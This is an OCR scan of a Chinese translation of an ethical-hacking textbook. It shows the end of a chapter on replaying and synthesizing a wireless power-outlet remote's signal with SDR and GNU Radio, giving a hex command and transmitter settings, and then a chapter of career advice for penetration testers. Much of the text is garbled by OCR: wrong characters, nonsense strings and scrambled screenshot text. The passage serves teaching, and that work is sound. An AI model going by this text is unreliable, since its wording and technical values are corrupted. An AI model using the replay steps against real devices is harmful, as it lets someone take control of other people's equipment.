13.3.1. 2.9.9 9 920.52 29 0 9099 0.9 9 4 3 5.0 9*4 0 9 9 9 09 
"m 2, 2r 2, 2,2,2,2, Lge ges 2,2, 2,2, Py ey 2 7 2,2,2,2, Lg Ag hy heey 2,2, 27r2r2r 
i e Po DD Bs le se ee Bs Sp ee i 


Input 0 = 28 symbols of zero to create the gap between packets 
Input 1 = 8 symbols of Non-Changing Data: Oxe8 

Input 2 = 92 symbols of Addressing Data for remote 1 plus the 16 symbols 
of the 

command to turn on outlet 1: 0x8e8880eee8ee888888888060 


运行 流 图 后 ， 将 得 到 一 个 名 为 test-preview 的 新 捕获 文件 。 如 果 流 图 正确 无 误 ， 
在 该 文件 上 苗 复 分 析 步 又 时 ， 将 得 到 相同 或 类 似 的 结果 ， 如 图 5-12 所 示 。 


Controls 的 | i 


| Open file... | 


Sample rate:  |1000000 © 


Spectrogram 

FFT size: = |— — 
Zoom: gi pum 
Power max: —— ' 
Power min: — |— 
Scales: v 


Time selection 
Enable cursors: v 


Symbols: |128 xd 

Rate: 28.4091Hz MERO o on a a d 
Period: 35.2ms $2519 02 53028 220 MA 120 220. 
Symbol rate: —3.63636kHz AE EE | lobi iy Bin Bia oh 


Symbol period: 275us rh ce 


5-12 ”inspectrum 预 览 图 
注意 ， 符 号 周期 的 总 数 是 128， 这 样 就 将 模式 与 间 际 匹配 起 来 。 


526 执行 


我 们 已 经 确认 ， 合 成 的 数据 与 我 们 以 传输 方式 接收 的 数据 是 相似 的 。 现 在 只 需 
要 开启 osmocom Sink( 如 图 15-13 所 示 )， 通 过 执行 流 图 来 传输 ， 并 观察 Power Outlet 
的 开局 。 要 开局 接收 费 ， 只 需要 右 击 块 ， 人 然后 选择 Enable。 为 尽量 减少 占用 的 存储 
空间 ， 你 可 能 想 要 关闭 文件 接收 堪 。 至 此 ， 终 于 利用 SDR 设 备 ， 成 功 并 完整 地 复制 
了 遥控 器 的 功能 。 
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第 5 章 软件 定义 的 无 线 电 


test-execute.grc - /GH5 - GNU Radio Companion 


File Edit View Run Tools 


Variable 
ID: symbol rate || ID: samples per symbol 
Value: 275u 


Vector Source QT GUI Frequency Sink 
Vector: 1,1,1..1,0,0, 0 | Patterned interleaver l FFT Size: 1024k 
Tags: | Center Frequency (Hz): 316M 
Repeat: Yes | Bandwidth (Hz): 1M 


Vector Source 
Vector: (1,0,0,0,1,1,1,0,1... 


osmocom Sink 
Sample Rate (sps): 1M 
Ch0: Frequency (Hz): 314.98M 
ChO0: Freg. Corr. (ppm): 0 
ChO0: RF Gain (dB): 10 

Ch0: IF Gain (dB): 20 

Ch0: BB Gain (dB): 20 


Tags: 


Int lation: 275 : 
inland Multiply 
Constant Source 
Constant: 0 
Sample Rate: 1M | E Sample Rate: 1M M © 
Waveform: Cosine | File Sink 


File: /GH5/test-preview 
Unbuffered: Off 


Frequency: 314.98M 
Amplitude: 1 
Offset: 0 


Append file: Overwrite 


图 15-13 ”最 终 的 执行 流 图 : test-execute.grc 
5.3 本草 小 结 
本 章 简 述 可 用 SDR 和 GNU Radio 完 成 哪些 工作 ， 你 已 经 能 够 分 析 简 单 的 RF 设备 
了 。 使 用 SCRAPE 流 程 ， 我 们 发 现 了 工作 频率 、 捕 获 了 数据 、 执 行 了 回放 攻击 、J 了 


解 了 数据 结构 并 合成 了 数据 。 同 时 了 解 到 ， 使 用 GNU Radio 时 ， 不 必 与 硬件 交互 即 
可 模拟 信号 。 硕 望 本 章 能 够 激 友 道德 黑客 们 对 SDR 的 学 习 热 情 并 捉 升 诺 位 的 目 信 。 
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第 || 部 分 


从 业务 角度 分 析 关 各 攻击 


成 为 一 名 渗透 测试 人 员 
红 队 的 行动 

28:89 ABW TTA 
漏洞 员 金 计划 


SOR 成 为 一 名 渗透 测试 人 员 


渗透 测试 领域 令 人 激动 ， 也 充满 挑战 。 很 多 泡 望 成 功 的 渗透 人 员 不 知道 从 何 处 
入 手 。 例 如 ， 一 名 致力 于 从 事 安全 事业 的 新 人 可 能 在 想 : 如 何 进 入 这 个 领域 ? 一 名 
成 熟 的 安全 从 业 人 员 在 思考 : 如 何 才 能 达到 更 高 的 水 平 ， 如 何 才 能 真正 完善 技术 ? 
如 何 开 始 独 立 工作 ? 如 何 给 那些 信任 的 组 织 提 供 尽 量 多 的 价值 ? 灰 帽 黑客 应 该 努力 
成 为 行业 精英 ， 追 求 卓 越 是 高 尚 的 行为 。 如 果 选 择 成 为 一 名 职业 渗透 测试 人 员 ， 本 
章 将 指导 如 何 发 展 并 完善 日 己 的 职业 生涯 。 

本 章 将 为 渴望 成 功 的 渗透 测试 人 员 提供 职业 路 线 图 ， 还 为 想 成 为 渗透 测试 行业 
专家 的 现 有 从 业者 提供 一 个 模型 。 本 章 将 讨论 如 何 优化 工作 、 扩 充 技 能 集 和 降低 工 
作风 险 ， 将 介绍 培训 和 学 位 课程 、 黑 客 攻 防 游戏 、 夺 弃 赛 (Capture the Flag, CTF), 
并 给 出 可 帮助 完善 技能 的 一 系列 指导 意见 。 在 本 章 的 指引 下 做 一 些 研究 、 完 成 一 些 
练习 并 接受 一 些 指导 意见 后 ， 致 力 于 从 事 安 全 事业 的 人 员 将 发 现 ， 从 新 手 成 长 为 专 
家 将 是 可 以 实现 的 目标 。 


本 章 讨 论 的 主题 如 下 : 
e 从 新 手 成 长 为 专家 的 历程 ”渗透 测试 精神 渗透 测试 分 类 、 实践 资源 、 培训 、 


学 位 课程 、 专 业 组 织 和 会 议 等 
e 测 透 测 试 技术 “减少 不 必要 的 责任 、 降 低 运营 风险 、 预 防 措施 、 管 理 和 执行 
渗透 测试 项 目 ， 以 及 报告 的 效率 等 


6.1 ”从 新 手 成 长 为 专家 的 历程 


无 论 哪个 行业 ， 要 成 为 一 名 专家 ， 束 要 具备 专业 能 力 ， 蝎 要 充满 热情 ， 要 致力 
于 实践 并 具有 坚 候 不 拔 的 意志 。 从 新手 成 长 为 专家 ， 驶 是 一 个 不 断 研究 、 练 习 和 人 参 
加 塔 训 的 过 程 ， 要 领情 “失败 是 成 功 之 母 ” 的 道理 。 道 德 黑 客 从 业 人 员 新 酬 不 菲 ， 
但 并 非 唾 手 可 得 ; 成功 前 要 经 历 多 次 失败 、 要 从 失败 中 吸取 教训 ， 然 后 掌握 并 精通 
此 项 技能 ， 长此以往 束 会 发 现 ， 刚 翻 过 一 媳 岭 ， 又 出 现 一 座 山 ， 新 挑战 又 摊 在 眼前 。 
ETE RSNA TR BAA ANE AEN, Fer bE RA, (ATC S AZ o 
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第 1 部 分 “从 业务 角度 分 析 黑 客 攻击 


6.1.1 渗透 测试 精神 


“好 奇 心 (Curiosity) ”是 渗透 测试 的 核心 精神 。 渗 透 测 试 黑 客 努 力 了 解 客 户 组 织 
的 相关 系统 ， 然 后 符 试 攻 殉 系统， 再 采用 新 颓 独到 的 方式 ， 不 投 照 原先 设计 的 方 陈 
使 用 系统 。 往 往 ， 为 攻击 一 个 系统 ， 束 要 在 深入 理解 这 个 系统 的 基础 上 ， 利 用 系统 
本 号 的 特性 来 攻击 系统 , 要 打破 第 规 。 道德 黑客 使 系统 以 超出 原来 预期 的 方式 运行 ， 
从 而 改造 系统 。 好 奇 心 和 知识 本 号 都 个 是 徘 恶 或 犯 非 。 实 际 上 ， 以 合乎 着 德 的 方式 
运用 知识 ， 退 求 做 正确 的 事情 ， 这 是 抵御 攻击 者 的 最 有 力 武 融 。 灰 帽 黑客 群体 也 在 
理解 坏人 从 事 破坏 的 攻击 行为 ， 并 运用 知识 去 阻止 恶意 攻击 。 

一 提起 着 德 黑客 ， 很 多 非 安 全 从 业 人 员 都 会 产生 误解 ， 这 是 因为 他 们 既 感 到 害 
介 ， 但 同时 也 殉 满 好 奇 。 普 通 大 众 只 是 了 解 到 年 期 黑客 受到 过 严 历 的 控告 ， 从 而 对 
所 有 和 擎 握 黑客 技术 的 人 员 长 惧 三 分 。 这 导致 很 多 道德 黑客 需要 投入 大 量 精力 去 反对 
旷 视 ， 去 保护 正当 权利 和 上 自由 ， 并 在 隐私 薄 受 负面 风险 时 及 起 抵制 。 安 全 研究 人 员 
与 法 院 之 间 的 激烈 斗争 史 导 致 黑客 团体 与 电子 前 治 基 金 会 Blectronic Frontier 
Foundation，EFF) 和 美国 公民 目 由 联盟 (American Civil Liberties Union，ACLU) 等 组 
织 建 立 起 紧密 的 联盟 关系 。 从 人 们 经 和 常 提 到 的 “黑客 宣言 (Hacker’”s Manifesto)" fi 
FEITH, ATLAS PIP HR ee UCR. PADIS. Ree EF [Ae 
测试 人 员 应 该 促进 平等 、 正 义 以 及 包容 ， 这 在 其 他 行业 或 团体 中 是 见 不 到 的 。 


6.1.2 渗透 测试 分 类 


前 面 讨论 了 所 有 黑客 的 共同 特点 是 “好 奇 心 ”但 讨论 道德 黑客 之 间 的 差异 同样 
重要 。 总 有 一 些 渗透 测试 人 员 无 法 精通 的 领域 。 虽 然 灰 帽 黑客 群体 中 的 一 些 具有 天 
赋 的 人 士 掌握 很 多 专长 ， 但 大 多 数 渗透 测试 人 员 只 能 精通 黑客 技术 中 的 几 个 领域 。 
新 人 在 开始 渗透 测试 职业 生涯 时 ， 一 定 要 找 准 目标 ， 才 能 及 挥 目 己 的 优势 。 

AAR AH NAMA A Be IETS I AEBS. FEW 
的 军旅 生涯 中 具有 物理 安全 专长 的 人 员 更 专注 于 如 何 绕 开 锁 以 及 操纵 摄影 机 和 大 
|。 其 有 工程 行业 背景 的 人 员 蝎 倾 辐 于 进行 艇 入 式 设 备 测试 。 人 很 多 渗透 测试 人 员 涉 
狂 的 范围 较 广 ， 运 用 IT 从 业经 验 专 门 进行 企业 攻击 模拟 测试 。 有 其 有 监测 、 控 制 和 数 
据 采 集 系 统 (Supervisory Control And Data Acquisition，SCADAI) 经 验 的 人 员 因 为 了 解 
相关 工控 系统 的 基本 知识 ， 更 专注 于 工业 控制 系统 (Industrial Control Systems, ICS) 
的 渗透 测试 。 目 标 是 运用 已 有 经 验 ， 并 在 已 有 知识 的 基础 上 在 渗透 技能 方面 取得 进 
一 步 肥 展 。 


6.1.3 ”未 来 的 黑客 攻击 
随 着 不 同 技 术 ( 如 软件 定义 的 无 线 电 (Software-Defined Radio，SDR)) 的 大 规模 投 


第 6 章 ”成 为 一 名 渗透 测试 人 员 


入 使 用 ， 以 及 人 工 智 能 (Artificial Intelligence，AD 和 机 器 学 习 系 统 (Machine Learning 
System) 等 新 技术 的 友 展 , 渗透 测试 人 员 将 需要 学 习 评 估 和 缓解 这 些 攻 击 行为 的 专门 
知识 。 对 于 几乎 所 有 未 来 的 “和 留 能 ”设备 ， 都 需要 进行 了 解 和 评估 ， 并 修复 其 中 人 存 
在 的 漏洞 。 当 前 ， 生 物 医学 设备 制造 商 已 经 开始 认识 到 保护 他 们 的 设备 的 重要 性 。 
设想 一 下 ， 基 于 纳米 扩 术 的 局 级 医疗 设备 将 无 处 不 在 ， 渗 透 测试 人 员 需 要 研究 如 何 
检测 和 阻止 攻击 行为 。 有 些 技 术 在 今天 听 来 像 科 学 约 想 ， 但 到 了 明天 ， 束 可 能 成 为 
现实 。 未 来 的 技术 进步 将 要 求 聪明 的 渗透 测试 和 安全 研究 人 员 面 对 挑战 ， 使 这 些 新 


技术 安全 地 为 我 们 服务 。 但 愿 我 们 能 跟 上 技术 发 展 的 步伐 。 
6.1.4 了 解 技术 


技术 前 进 的 步伐 不 会 停止 ,技术 将 变 得 日 益 复杂 ， 相 互 的 联系 将 更 为 密切 。 用 
于 评估 未 来 技术 的 攻击 行为 的 技能 将 随 着 技术 的 发 展 而 发 展 。 道 德 黑 客 必须 拥有 人 解 
决 复杂 问题 的 能 力 ， 拥 有 跟 上 新 技术 的 好 奇 心 和 工作 态度 。 最 优秀 的 渗透 测试 人 员 
拥有 多 种 技能 集 以 及 多 项 专长 。 要 成 长 为 一 名 专业 的 渗透 测试 人 员 ， 一 个 关键 方面 
是 学 习 如 何 编写 代码 ， 因 此 ， 第 2 章 讲 述 了 一 些 必 备 的 编程 技能 。 

渗透 测试 人 员 最 起 码 要 理解 上 自己 正在 评估 的 技术 。 必 须 理解 与 目标 相关 的 基本 
技术 信息 。 如 果 渗 透 测 试 人 员 正 在 处 理 散 入 式 人 硬件 或 物 联 网 (IoT) 设 备 ， 那 么 理解 系 
统 工程 和 岁入 式 Java 技 术 肯 定 大 有 好 处 。 如 果 正 在 为 一 家 提供 云 服务 的 公司 评估 外 
围 安全 ， 屠 么 理解 用 于 创建 应 用 程序 的 编程 语言 和 数据 库 技 术 将 是 一 个 民 好 开端 。 
评估 企业 系统 的 渗透 测试 人 员 会 因为 理解 正在 使 用 的 操作 系统 、 应 用 程序 和 网 络 技 
术 而 获 益 。 例 如 ， 如 果 正 在 测试 基于 AS400 系 统 的 环境 ， 则 必须 理解 AS400 系 统 的 
细微 之 处 ， 以 及 该 系统 与 其 他 技术 的 不 同 之 处 。 


6.1.5 METLE “RY” AY 


不 仅 要 理解 渗透 测试 团队 正在 评估 的 拉 术 ， 还 必须 扎实 理解 安全 操作 和 最 佳 实 
践 。 了 解 对 特定 设备 或 技术 而 言 什么 是 “ 民 好 的 ” 将 允许 测试 人 员 正确 修 复 所 友 现 
的 问题 。 因 此 ， 第 8 草 将 重点 介绍 新 一 代 安 全 操作 。 

理解 攻击 的 实施 方式 是 网 络 安 全 的 一 个 方面 。 但 渗透 测试 人 员 的 其 正 意图 是 能 
够 保护 组 织 ， 即 了 解 如 何 检测 到 攻击 并 在 必要 时 予以 阻止 攻击 。 有 些 道德 黑客 缺乏 
纠正 所 友 现 的 漏洞 的 技能 , 这 是 一 个 重大 缺憾 。 因 此 , 第 8 章 将 介绍 防御 性 安全 控制 。 

通过 许多 途径 可 以 了 解 到 什么 是 “ 民 好 的 ”。 一 个 最 宫 有 价值 的 资源 是 : 渗透 测 
试 新 手 可 以 同一 位 经 验 丰 蜗 的 专业 人 员 求 教 。 老 师 未 必 是 行业 新 人 玖 悉 的 人 士 ， 甚 
至 可 以 是 以 前 从 未 交流 过 的 人 员 。 道 德 黑 客 社区 始终 或 励 知 识 传播 。 许 多 道德 黑客 
会 通过 推 特 、 博 客 提供 有 价值 信息 ， 也 可 能 撰写 撤 术 文 章 或 相关 主题 的 书籍 。 渗 透 
测试 新 人 可 以 阅读 Georgia Weidman 25€ 5 HJ Penetration Testing: A Hands-On 
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第 上 部 分 “从 业务 角度 分 析 黑 客 攻击 


Introduction to Hacking (No Starch Press, 2014)， 旋 后 将 获 区 上 匪 浅 。 这 是 一 本 经 典 的 入 
门 书 籍 ， 介 绍 基础 知识 (例如 ， 如 何 设 置 虚 拟 机 )， 还 介绍 如 何 使 用 手册 。 访 书 还 延 
伸 到 其 他 主题 ， 例 如 ， 绕 过 反 病 毒 软件 以 及 对 智能 手机 进行 渗透 测试 。 丸 一 个 优 荔 
资源 是 已 经 上 市 的 很 多 Hacking Exposed 书 籍 ， 这 些 书籍 的 主题 各 不 相同 ， 包 括 移动 
设备 、 无 线 设 备 和 工业 控制 系统 。 


6.1.6 iei 


有 很 多 培训 选项 有 助 于 灰 帆 黑客 获得 所 需 的 技能 集 ， 从 而 成 长 为 一 名 出 色 的 渗 
歼 测试 人 员 。 每 年 ， 阁 名 的 黑 帽 拉 术 大 会 都 提供 多 种 培训 选项 ，SANS Institutet h 
许多 现场 和 远程 培训 选项 ,Offensive Security 也 提供 一 些 备 受 推崇 的 培训 选项 。 目前 
有 多 项 渗透 测试 认证 ， 这 些 认证 的 难度 和 质量 各 不 相同 ， 因 此 ， 从 安全 行业 认可 的 
机 构 接 受 培训 是 十 分 重要 的 。SANS Institute 的 课程 可 引导 候选 人 备考 GIAC(Global 
Information Assurance Certificatiom 认 证 的 渗透 测试 人 员 (GPEN)， 这 是 一 个 不 错 的 起 
ki. Offensive Security 的 认证 系列 起 点 OSCP(Offensive Security Certified Professionals) 
也 得 到 了 广泛 认可 ， 被 公认 为 渗透 测试 认证 中 的 精华 。 在 OSCP 考 试 期 间 ， 候 选 人 
可 以 在 24 小 时 内 访问 一 个 实验 室 ， 以 展示 修 选 人 的 黑客 攻击 技能 。 如 果 证 实 候选 人 
具有 成 功 执行 攻击 以 及 撰写 专业 报告 的 能 力 ， 候 选 人 将 获得 OSCP 认 证 。 

其 他 渗透 测试 证 书包 括 EC-Council 的 CEH(Certified Ethical Hacking) 认 证 。 不 过 ， 
无 论 一 项 认证 是 耕 要 求 候选 人 展示 攻击 实验 室 的 能 力 ， 坦 日 地 讲 ， 安 全 行业 普 裔 都 
认为 认证 是 一 项 宝 员 的 资源 ， 候 选 人 可 以 在 和 学习 过 程 中 了 解 实 施 攻 击 的 行 话 以 及 过 
程 , CEH 并 不 强制 候选 人 展示 攻击 技能 或 编写 渗透 测试 报告 的 能 力 。 通过 诸如 GPEN 
和 CEH 等 个 要 求 展示 键盘 技能 的 认证 获得 的 知识 当然 具有 价值 ， 这 些 认证 当然 会 给 
行业 和 渗透 测试 人 员 市 来 好 处 。 但 有 必要 了 解 不 同 认证 及 取 的 不 同方 法 ， 从 而 选 出 
对 当前 职业 最 具 价 值 的 认证 。 最 好 确定 “ 走 同 ”， 先 参加 传统 认证 ,在 确认 目 己 的 书 
面 技能 后 ， 再 考虑 OSCP 之 类 的 认证 。 


6.1.7 ”实践 


一 些 效果 最 佳 的 培训 既 不 在 课堂 上 也 不 在 培训 会 议 上 ， 而 在 工作 中 或 家 庭 实验 
室 里 。 在 道德 黑客 领域 ， 没 什么 比 实际 工作 经 验 更 重要 。 最 好 在 键盘 上 完善 你 的 渗 
透 测试 搁 能 。 可 用 的 资源 有 很 多 ， 例 如 ， 很 多 公司 提供 实验 室 供 你 练习 。 在 今天 ， 
你 可 利用 这 些 资 源 ， 更 方便 地 提升 目 己 的 渗透 测试 技能 。 

虚拟 技术 ， 包 括 专 门 集成 了 各 种 漏洞 的 虚拟 机 (例如 ，Metasploitable) 和 其 他 资 
源 ， 可 帮助 道德 黑客 及 新 人 们 构建 完整 的 测试 环境 ， 与 以 前 相 比 ， 灰 帽 黑客 现在 需 
要 完成 的 工作 量 很 少 。vulnhub.com 是 一 个 行业 聚 军 爸 ， 人 允许 道德 黑客 访问 内 置 了 许 
多 漏洞 的 系统 ， 从 而 进行 练习 ( 见 图 6-1)。 与 以 前 相 比 ， 可 更 方便 地 利用 vulnhub.com 


第 6 章 成 为 一 名 渗透 测试 人 员 


PEIR EEDE. 


| billu: bOx Manish Kishan Tanwar 21 Apr 2017 


This Virtua! machine is using ubuntu (32 bit) 
Other packages used: - 


» PHP 
» Apache 


This virtual machine is having medium difficulty level with tricks. 


|| One need to break into VM using web application and from there escalate privileges to gain root access 


i| For any query ping me at https://twitter.com/IndiShell1046 


Enjoy the machine 


5587 56 RAREAIDUBFEAXRRS? 33ORE F003 101 SRO 


f= Walkthroughs © Download 


| Moria: 1.1 abatchy 29 Apr 2017 


: Moria 

. Through DHCP 
y: Mot easy! 

. Get root 


| DESCRIPTION: 

| Moria is NOT a beginner-oriented Boot?2Root VM, it will 
| require good enum skills and a lot of persistence. 

| 

| VM has been tested on both VMware and VirtualBox, and 


| gets its IP through DHCP, make sure you're on the same 


| sHAT:27ESBCAATATBSFSCCASEOICR35EBESCB 


f= Walkthroughs ® Download 
图 6-1 。 vulnhub com 堪 称 聚 宝 盆 ， 内 置 了 许多 存在 漏洞 的 
RA EMH, SAMA R A RF SRA 


德 黑 客 社区 确实 有 目 己 的 文化 氛围 。 渗 透 测试 不 仅 是 职业 选择 ， 也 是 一 种 爱 
I NEM xz 亲 时间、 晚上 体 妃 时 间 和 周末 时 间 参 加 安全 会 议 或 CTF 
onl REV TEU RAR hs. CTRIAMABAE EE. EARNE ACTF 
结构 ， 两 个 对 立 的 团队 尝试 渗透 到 彼此 的 CTF 环 境 ， 同 时 尝试 加 固 和 保护 自己 的 环 
境 来 防御 对 手 的 攻击 ， 试 图 成 功 村 谍 。 适 于 新 手 参 加 的 知名 活动 包括 Joes vs. Pros 比 
赛 ， 一 些 新 手 在 一 定 的 指导 下 ， 与 专业 渗透 测试 人 员 展 开 竞 争 。CTF 活 动 也 可 是 
“绝境 ”形式 的 钊 标 赛 ， 道 德 黑 客 单枪匹马 B y 3e MER, FR I. 
家 住 小 镇 、 不 方便 杀 目 参加 CIEF 活 动 的 道德 黑客 可 参加 多 项 在 线 CTF 活 动 。 
CTF365.com 和 CTFtime.org 等 知名 网 站 (如 图 6-2 所 示 ) 是 锅 望 在 家 中 提升 技术 的 人 
员 的 宝贵 资源 。 
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CTF CB] TIME 


Team rating Past events a 


2016 2015 2014 2013 With scoreboard All 


Rating SHA2017 CTF 


Aug. 06, 2017 22:00 UTC | On-line 


Team 


Plaid Parliament of Pwning 701.259 
Place Team Points 

570.149 
w1 Eat, Sleep, Pwn, Repeat 49.720 

469.705 
2 Just Hit the Gore Lu a0.684 

Bushwhackers 435.993 
3 HackingForSoju l 25.044 


3 Dragon Sector 476.095 


426.139 462 teams total | Tasks and writeups 


bugs bunny ctf 2k17 
July 30, 2017 19:00 UTC | On-line 


» Shallphish 


; binja «5.130 


dcua ada. 433 


Place Team Points 


| ie 二 E BE M8 NM Hm eg 
可 


p4 337.011 


ud acua 43.4980 
J TIastel2zss 33:3]. :3:3] 
2 The Norrhem Coalition 31.098 


Full rating | Rating formula 3 HackXore = 27.030 
Upcoming events za ; | 
417 teams total | Tasks and writeups 


Open 
DEF CON CTF 2017 
July 30, 2017 11:26 UTC | Las vegas, USA 
Format Mame Date Duration 
Place Team Points 
HITE CTF Singapore 2017 Thu, 4ug. 24, 08:00 — Fri, Aug. 1d 6h 
* InterContinental Singapore, 25, 14:00 UTG 1 teams »1 Plaid Parliament of Pwning : 180.000 
Singapore 
2 HITCON 112.392 
HacklT CTF 2017 Fri. Aug. 25. 14:00 = Sun, Aug. 
On FEM j 
EUN g On-line 27, 14:00 LITC ES teams a AOE T3296 


图 6-2 CTFtime.orgzé — MEMAR, TEER A n CEE ey SCTE] 


BA- ERIAREN. EDS een mee Bob he, B6-3F H 
OverTheWire.org 提 供 了 从 初级 水 平 开 始 ， 适 合 各 种 不 同 级 别 的 攻防 演练 游戏 ， 攻 防 
洲 戏 Bandit 是 初学 者 非常 宝 贯 的 资源 。 

Wargames 


Matas 
Leviathan 


The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games. 
To find out more about a certain wargame, just visit its page linked from the menu on the left. 


Narnia If you have a problem, a question or a suggestion, you can join us on IRC. 
Krypton 


Behemoth Suggested order to play the games in 
Utumno 

Maze l. Bandit 

2. Leviathan or Natas or Krypton 

3. Narnia 


Vortex 


Semtex 4. Behemoth 


5. Utumno 


Drifter 6. Maze 


Manpage 


图 6-3 ”OverTheWire.org 提 供 的 攻防 游戏 


在 互联 网 上 ， 有 很 多 可 供 违 德 黑 客 练习 以 提高 攻击 技能 的 资源 。 可 考虑 参加 
SANS Institute 的 NetWars 或 使 用 OSCP 实 验 室 ( 无 论 是 否 参 加 过 认证 测试 ， 都 可 以 使 
用 )。 男 外 ，Arizona Cyber Warfare Range 是 一 个 优 务 的 非 膏 利 资源 ， 还 有 很 多 大 学 文 
持 的 和 私营 的 网 络 臣 场 (Cyber Range)。 与 往 第 一 样 ， 在 参加 游戏 前 ， 要 留意 活动 并 
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研究 站 点 。 为 当今 拥有 的 资源 感到 庆 圣 吧 ! 上 一 代 的 渗透 测试 人 员 可 没有 此 类 资源 


可 供 使 用 。 
6.1.8 ”学 位 课程 


虽然 可 以 通过 多 种 途径 来 提高 渗透 测试 技术 ， 但 通过 正式 参加 学 院 或 大 学 的 教 
育 始终 是 最 全 面 的 学 习 方 法 。 为 填补 知识 鸿沟 ， 网 络 安 人 全、 计算机 科学 或 工程 学 位 
的 全 面 性 不 可 低估 。 美 国 国 家 安全 局 (National Security Agency，NSA) 和 国土 安全 部 
(Department of Homeland Security，DHS) 联 合资 助 了 两 个 项 目 : 国家 网 络 防御 早 越 学 
术 中 心 (National Centers of Academic Excellence in Cyber Defense) 和 国家 网 络 运营 学 
AR Six rH (National Centers of Academic Excellence in Cyber Operations). 3X P^] Ji 
目的 目标 是 扩充 能 文 持 国家 网 络 安全 的 熟练 技术 人 员 。 多 所 备 受 推 寻 的 知名 大 学 ， 
如 美国 卡 而 基 梅 隆 大 学 和 美国 海军 研究 生 院 都 参加 了 美国 国家 安全 局 的 学 术 早 越 中 
心 项 目 。 

也 有 不 同 于 传统 学 位 读 程 的 蔡 代 品 。 人 例如， 哈佛 大 学 创立 了 哈佛 扩展 和 学院， 多 
许 学 生 不 必 站 先 考 入 哈佛 大 学 束 能 参加 诬 程 ， 如 果 学 生 在 哈佛 扩展 学 院 有 三 门 访 程 
表现 优异 ， 则 有 资格 参加 学 位 课程 。CS50 是 哈佛 的 计算 机 科学 入 门 课程 ， 是 一 个 相 
当 不 错 的 起 点 。 任 何人 都 可 通过 这 条 路 径 在 哈佛 上 课 ， 表 现 优异 者 可 在 这 所 一 流 大 
学 获得 学 位 。 还 有 几 所 备 受 推 水 的 大 学 提供 类 似 诬 程 ， 如 打 省 理工 学 院 提供 免费 在 
线 课 程 ， 斯 坦 福 大 学 则 提供 100 多 门 免 费 在 线 课 程 ， 供 公众 参加 。 

另 一 方面 ， 很 多 主 有 革新 精神 的 高 等 学 府 正 在 提供 认可 计划 ， 推 动 根据 工作 经 
验 、 才 能 和 行业 证 书 获得 网 络 安全 学 位 。 这 种 有 别 于 传统 教育 的 新 方法 ， 既 有 传统 
学 位 课程 的 符 点 ， 义 允许 成 人 通过 拉 术 行业 证 书 获得 大 学 学 分 ， 或 通过 展现 工作 知 
识 完 成 诛 外 测试 。 由 于 道德 黑客 技能 的 “动手 ”特性 ， 这 种 方法 效果 不 错 。 更 新 的 
基于 能 力 的 和 学校， 如 西部 州长 大 学 (Western Governors University) 则 在 尝试 改变 教育 
模式 ， 用 新 颖 也 受到 争议 的 在 线 学 位 课程 来 完善 高 等 教育 。 参 加 大 多 数 技术 谍 程 都 
会 获得 行业 认证 ， 为 工作 人 员 的 职业 生涯 立即 市 来 价值 。 


6.1.9 知识 传播 


获取 渗透 测试 信息 的 最 佳 来 源 是 社区 的 其 他 安全 专业 人 员 。 可 在 网 上 找到 无 数 
人 视频， 这些 视 频 几 乎 涵盖 了 渗透 测试 的 所 有 方面 。 例 如 ， 网 络 安全 会 议 的 讲话 视频 
会 定期 在 线 播 出 。 即 使 可 以 杀 上 日 参加 会 议 ， 黑 帽 拉 术 大 会 和 DEF CON 安 全 会 议 的 讲 
话 视 频 也 是 有 用 的 ， 因 为 谁 也 不 可 能 亲 目 参加 每 场 会 议 。Irongeek.com 的 知识 库 中 
包括 DerbyCon 和 ShmooCon 内 容 , 也 十 分 有 用 。 对 于 全 球 各 地 的 读者 而 言 , ZeroNights 
和 SyScan 会 议 内 容 者 值得 一 看 。 

与 其 他 许多 行业 不 同 ， 网 络 安全 社区 更 多 将 获得 技能 看 成 一 项 爱好 ， 而 非 一 项 
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无 聊 的 工作 。 专 注 于 培养 新 渗透 测试 人 员 的 社区 团队 数量 众多 ， 这 说 明媚 德 黑 客 的 
社区 正在 积极 投 喘 于 共享 知识 ， 为 行业 新 人 营造 一 个 包容 的 氛围 。 诸 如 
SecurityTube.net 有 的 站 点 多 年 来 一 直 在 推动 知识 共享 。 

活跃 的 渗透 测试 社区 是 必 不 可 少 的 ， 因 为 新 的 攻击 技术 时 刻 都 在 产生 。 亚 意 攻 
击 者 和 安全 研究 人 员 经 第 公布 新 的 攻击 行为 。 安 全 社区 在 不 断 开 上 友 安 全 控制 措施 ， 
来 修复 当前 可 能 被 利用 的 问题 。 这 意味 痢 ， 最 优秀 的 渗透 测试 人 员 始 终 紧 跟 攻击 和 
防御 安全 技术 的 发 展 步伐 。 灰 帽 黑 客 们 深 深 知 道 ， 一 些 旧 问题 依然 存在 ， 同 时 新 的 
攻击 行为 、 设 备 和 技术 在 人 不断 涌现 。 信 息 系 统 安全 协会 (Information Systems Security 
Association, ISSA) 和 JInffaGard 等 专业 组 织 正 在 不 断 为 道德 黑客 提供 指导 ， 
Infosec-conferences.com 列 出 了 可 参加 的 会 议 信息 。 


6.2 ”渗透 测试 人 员 和 职业 技能 


前 面 讨论 的 内 容 为 渗透 测试 人 员 打 下 了 良好 基础 。 下 面 讲述 如 何在 有 偿 或 无 偿 
工作 中 使 用 所 学 到 的 道德 黑客 技能 。 假 设 一 位 具有 一 定 经 验 的 专业 渗透 测试 人 员 ， 
现在 需要 承担 更 多 责任 ， 甚 至 想 要 上 自 办 一 家 小 公司 ， 目 标 是 扩充 一 个 团队 以 一 次 处 
理 一 个 大 项 目 。 当 专业 渗透 测试 人 员 不 再 是 独行 侠 时 ， 就 必须 学 会 协作 技巧 。 本 市 
不 是 介绍 创办 一 家 小 公司 的 基础 知识 ， 而 是 讨论 决定 启动 渗透 测试 业务 时 需要 考虑 
的 特殊 事项 。 


6.2.1 个 人 责任 


道德 黑客 职业 会 带 来 快乐 ， 但 也 会 招来 麻烦 。 因 此 ， 在 选择 这 个 职业 时 ， 最 好 
想 清楚 所 需要 面 对 的 不 可 避免 的 风险 。 对 小 型 渗透 测试 业务 进行 风险 评估 与 以 往 完 
成 的 风险 评估 类 似 。 需 要 考虑 业务 面临 的 风险 ， 理 解 工作 中 的 漏洞 ， 并 将 风险 降 至 
自己 可 接受 的 水 平 。 


1. 业务 结构 


作为 企业 拥有 者 ， 在 启动 业务 时 ， 需 要 控制 个 人 员 任 范围 。 考 处 成 立 一 家 有 限 
责任 公司 (LLC)， 或 合并 成 立 一 家 小 型 企业 股份 公司 (S 型 公司 )。 如 果 能 恰当 实施 这 
